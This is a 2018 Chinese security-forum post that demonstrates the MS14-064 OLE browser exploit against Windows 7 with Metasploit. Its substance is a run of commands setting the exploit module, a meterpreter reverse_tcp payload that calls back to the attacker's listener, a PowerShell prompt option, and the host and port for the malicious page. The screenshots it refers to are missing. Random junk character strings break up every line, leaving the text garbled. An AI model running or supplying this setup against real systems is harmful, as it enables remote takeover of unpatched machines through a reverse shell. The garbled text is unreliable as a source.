找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1418|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% f/ A2 x( k3 ]! l1 A 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 ' ^/ s9 G$ g) ]5 Y6 L: ^: `

# ~! e7 n# D, M! q! b. w' L

9 M. o. s. M9 Y' ?" V 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + Y3 i0 U1 T) N" q( W

* a5 c- u" l( A) e& E% x; Y; ?. ?

1 A7 p; u4 w& ^3 B% h 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ q4 \9 ^3 Y# T

' B/ G) ^4 _% O7 D

& R! b& S+ h5 D. e3 i1 F             set AllowPowershellPrompt true9 h5 N8 t( ^1 k

: m6 b; G) J& m- m

; S8 [5 {- v1 J             Set LHOST 192.168.0.109 9 I) \, n" M* j' }3 @! ]; D

. v" ^( O: g4 B b; p2 S7 A

9 _ d+ S# f% @             set SRVHOST 192.168.0.109' C# f& F% g, a1 {( N! i, D

- a+ x/ \8 W+ l; ^) U: _

+ L" m/ f. a3 W! b, J) L" L             Set uripath share" X6 O1 S, I8 H

7 W$ a/ I4 F5 a; Y0 f2 W0 |6 T

( n6 r: d3 N' j0 O4 b             Set srvport 80 ) M$ D5 @) o1 {/ F+ _ Z; ?

5 b: x0 z8 }$ x m! e

3 ?5 ^4 Z& w& I) y1 {/ V4 n C   0 }& U* U8 H, O2 D( Z: [. j q

+ p& U* ^1 s$ m( e6 G3 t- J

! z: ^5 t+ g( ^1 }0 z# v4 h  1 w" \; @9 A* p4 c

1 U# ?+ x2 `3 b

$ ~% v; u) p* `, ~* g S   6 }# Y0 f$ g1 ~3 A) J* R0 _

9 V: e% {( l* Z! q! X/ u

r: z L3 M" {% B3 O" G+ E# `  1 A- W {& J4 ~7 Q/ {7 O3 K

8 Y3 y' U, w8 {* G) Q& ~) M' l

: t9 z. o* |3 O' c; o$ }2 K- I  3 e2 C$ z0 G6 r0 M& l: {/ S

- N9 C7 Q2 D, l9 p' }* o1 }, o

- H- [0 c1 | ?: I 下面我们来访问本地地址如图:- T5 _% ]. j1 S, z8 ^

( v I6 ^% L) A% [! g# g

& i$ w+ e+ |# z2 @% Y  " v6 `1 U8 g' i; p4 e: v* U

- N$ E( _8 o6 Q, D3 K1 x

; z: u+ t6 E9 e9 i- }   + I* m5 b3 N/ u$ d- y& f* s7 z

0 Q' ~2 A" y3 h0 y

: D2 z9 P9 D) d1 X / \- {" S; X: A# W$ @- y1 U9 i

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表